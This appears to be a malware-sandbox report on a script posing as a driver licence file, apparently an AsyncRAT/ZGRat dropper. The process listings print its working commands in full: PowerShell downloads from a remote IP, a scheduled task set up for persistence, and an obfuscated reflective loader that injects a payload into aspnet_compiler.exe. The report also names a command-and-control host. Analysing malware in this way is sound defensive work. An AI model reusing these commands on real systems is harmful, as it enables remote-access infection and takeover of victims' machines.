memory/2468-14-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2468-15-0x000007FEF4850000-0x000007FEF51ED000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win7-20231215-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2128 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2128 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2128 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRlVERS-LlCENSE.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
Files
memory/2708-7-0x000000001B2B0000-0x000000001B592000-memory.dmp
memory/2708-8-0x00000000022E0000-0x00000000022E8000-memory.dmp
memory/2708-9-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp
memory/2708-10-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp
memory/2708-11-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2708-13-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2708-12-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2708-14-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2708-15-0x000007FEF5730000-0x000007FEF60CD000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win10v2004-20231215-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2420 set thread context of 1216 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 4728 set thread context of 4124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRlVERS-LlCENSE.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
C:\Users\Public\Rar.exe
Rar.exe x -p111 load.rar
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 29.185.107.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.23.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.23.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.234.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | win0090.theworkpc.com | udp |
| NL | 91.92.250.202:5010 | win0090.theworkpc.com | tcp |
| NL | 91.92.250.202:5010 | win0090.theworkpc.com | tcp |
| NL | 91.92.250.202:6606 | win0090.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 202.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
memory/4172-3-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/4172-4-0x000001FCB8290000-0x000001FCB82A0000-memory.dmp
memory/4172-5-0x000001FCB8290000-0x000001FCB82A0000-memory.dmp
memory/4172-6-0x000001FCB82F0000-0x000001FCB8312000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hok5yuyo.b1g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4172-16-0x000001FCD0890000-0x000001FCD08B6000-memory.dmp
memory/4172-17-0x000001FCD0C20000-0x000001FCD0C34000-memory.dmp
memory/4172-20-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
C:\Users\Public\basta.js
| MD5 | acc80e9a87c6fa26564d11ba56eb1529 |
| SHA1 | bc7fd2c2afae4511618c540a827cd3263e4df4fb |
| SHA256 | f9f6b12f1afd646a4822f11eb2c84533c4afab06162c84dd184b20eae3f40ebe |
| SHA512 | caa4b016b9062a1b39d5e4981aa6104f1a10f3d0a855b83d2f6d6f49d1aa05f4e63b4f81ee3b7fb1009cb003478834e014d8807fa793820535c3cce03bfb6500 |
C:\Users\Public\node.bat
| MD5 | 15333bb0cc252086e87ad2aea347d684 |
| SHA1 | 303efa040dd58b5d27bd884bab31cabcd7030315 |
| SHA256 | 7db89368b3daa954c91364203c177d469fbc56d09b69acf71116b3f0eeffd657 |
| SHA512 | d7308fbeacbf4a1c807850aa19c888a79feeed023fcfa872751d7bc60ab8afb7d631bbb5d3819da3b5882ed642a30604451d9eed62927b87fb813c27c12a24db |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 61e2e57471d559f5f6813c0a7995c075 |
| SHA1 | 33c621541bc0892ddab1b65345a348c14af566e5 |
| SHA256 | c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d |
| SHA512 | 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8d7e0002c9295953b71ebaeac595800e |
| SHA1 | a5e815f068d7e4691bde282be2f84823eb16720d |
| SHA256 | 38f182beb7d50c8894aa652e0596d456d8a69ec97feef3986573bad9c3c95426 |
| SHA512 | b83a3eadc3a3f5e133fc2b6b1a24654b4db784509fd35ad4771dc1740371bec0a355338bbf1aef544c2b4459c9305c2480d2d64af3748f20343b7ffecf042154 |
memory/2580-62-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/2580-63-0x0000019C623B0000-0x0000019C623C0000-memory.dmp
memory/2580-64-0x0000019C623B0000-0x0000019C623C0000-memory.dmp
memory/2580-65-0x0000019C623B0000-0x0000019C623C0000-memory.dmp
memory/2580-66-0x0000019C7A980000-0x0000019C7A9A6000-memory.dmp
memory/2580-68-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/3320-78-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/3320-80-0x0000025788AB0000-0x0000025788AC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 167f381c329c62480d027de6d008e79d |
| SHA1 | 28643a3489f37677b9d413b0646bea205de42942 |
| SHA256 | e27316beef7faceba559ae7035f9d0a6534f9f73e766d37133544b8de4a7975e |
| SHA512 | eae5bd4509cc6ca3cd7a9a41ea3da107d6b7528e3d208cc506c13c91cd74801951155a466bdb609edff41155c10ac1431e4b8c2b047f8937b10e5d6c7534ece3 |
memory/3320-79-0x0000025788AB0000-0x0000025788AC0000-memory.dmp
memory/3320-83-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | ea7771c6e2cd4c1e9b1f00f233764a8c |
| SHA1 | 69fc45ead32fe3749e6b1e2a6eaf6ade10e0379d |
| SHA256 | f2065f51a038146796411358d464c9e0a4ec2c5ba89d1157c588ac2175cb1122 |
| SHA512 | 32c88a76ce6cbaa15531138209a8b644f297264a0b7e3f79a2a0ae88e93793ba88eb95fc7e8cd52b884afa426a93ada3682425afba93098114622aa22d5b1ba1 |
memory/2420-87-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/2420-88-0x000001C0CFB40000-0x000001C0CFB50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c6d77fcdff44c8b146ccf0b98121018 |
| SHA1 | b73e0ec9d0749fd4daa8ceaf2405d8bc4c001f4c |
| SHA256 | 2a370a176ab866538648d5b6aae93dcde5afdca45e5fa42011abca1207ec187d |
| SHA512 | 21369273289dd5f9ffcf4e3b6bc134ab393472ac9907a2601885dd6181b2b241eba22253eccb2c0d0d354458df2358604c49ed8abb715cd50c3db5dd72b020e1 |
C:\Users\Public\msg.txt
| MD5 | 57ece7de9ff20214d5949a1a31114d06 |
| SHA1 | 046a95241bbd0dd825dd8738e5c6ccf5f887ba19 |
| SHA256 | c0f52718e1f62533b1e9fb6b4635f59023abe58ede410de7481cd4be6c20eb0f |
| SHA512 | 32004c2e1c748e1e46aa8da74634fe9510ee9d93a3a3d46bb65c9d8444579429706099e6ea42f8a95f9841652f850ecade0d8c3c9324057822b246793f300f6c |
C:\Users\Public\runpe.txt
| MD5 | 5484b3b6ed63609cb1123976a3394c9a |
| SHA1 | 9535add105a42a49171c0973a1f9c55a872fc0b5 |
| SHA256 | 7b841fe29eab8eee796195c2b269acf517c57dd1fd9ebb565c1266497a7b1fb9 |
| SHA512 | 0a7973485f58a8d700c01c72dba3f976a02af6f4da97d2109df64168b0dd926024eaf60d740c67707a3b13d115c14cfaaa876242ad42cd012c74a9069ad92453 |
C:\Users\Public\Framework.txt
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\Execute.txt
| MD5 | 40cd014b7b6251e3a22e6a45a73a64e1 |
| SHA1 | 6ea36ce8d4940505e9a2c8fea5db868cd8b3d440 |
| SHA256 | e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1 |
| SHA512 | 776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea |
C:\Users\Public\NewPE2.txt
| MD5 | 8a56a0e23dbfe7a50c5ec927b73ec5f2 |
| SHA1 | abebd513e68e63e7ec6ae56327c232b6e444ce0a |
| SHA256 | 3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1 |
| SHA512 | 276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2 |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
memory/2420-108-0x000001C0CFE30000-0x000001C0CFE82000-memory.dmp
memory/1216-109-0x0000000000400000-0x0000000000416000-memory.dmp
memory/2420-112-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/1216-113-0x0000000074540000-0x0000000074CF0000-memory.dmp
memory/1216-114-0x0000000004EC0000-0x0000000004ED0000-memory.dmp
memory/1216-115-0x00000000057C0000-0x0000000005D64000-memory.dmp
memory/1216-116-0x0000000005400000-0x0000000005492000-memory.dmp
memory/1216-117-0x00000000053F0000-0x00000000053FA000-memory.dmp
memory/1216-120-0x00000000065B0000-0x000000000664C000-memory.dmp
memory/1216-121-0x00000000061B0000-0x0000000006216000-memory.dmp
memory/1216-122-0x0000000074540000-0x0000000074CF0000-memory.dmp
memory/1216-123-0x0000000004EC0000-0x0000000004ED0000-memory.dmp
memory/4728-124-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
memory/4728-125-0x000002A49C790000-0x000002A49C7A0000-memory.dmp
memory/4728-126-0x000002A49C790000-0x000002A49C7A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 74179d5ae9b80293ae3449528e52ac5b |
| SHA1 | 1c5c0a6be28782aaaabd0ba87741fd23d95101ed |
| SHA256 | 6ef98b7f4b417b5943919aee34eae942ba865c5d40b57eb81103fcc54e1d86cc |
| SHA512 | 12c34cc36e6cff6f381268cb26a4a792dea5a168cfe08dd45fa3085cc672f5ce257517ea9d78db0fa64e855ee8d642db9dd7a59ef33f223d352cdfe31e0dc1bc |
memory/4728-137-0x000002A49C790000-0x000002A49C7A0000-memory.dmp
memory/4728-138-0x000002A49D250000-0x000002A49D2A2000-memory.dmp
memory/4124-142-0x0000000074540000-0x0000000074CF0000-memory.dmp
memory/4728-143-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win10v2004-20231215-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4404 set thread context of 1688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 4592 set thread context of 316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
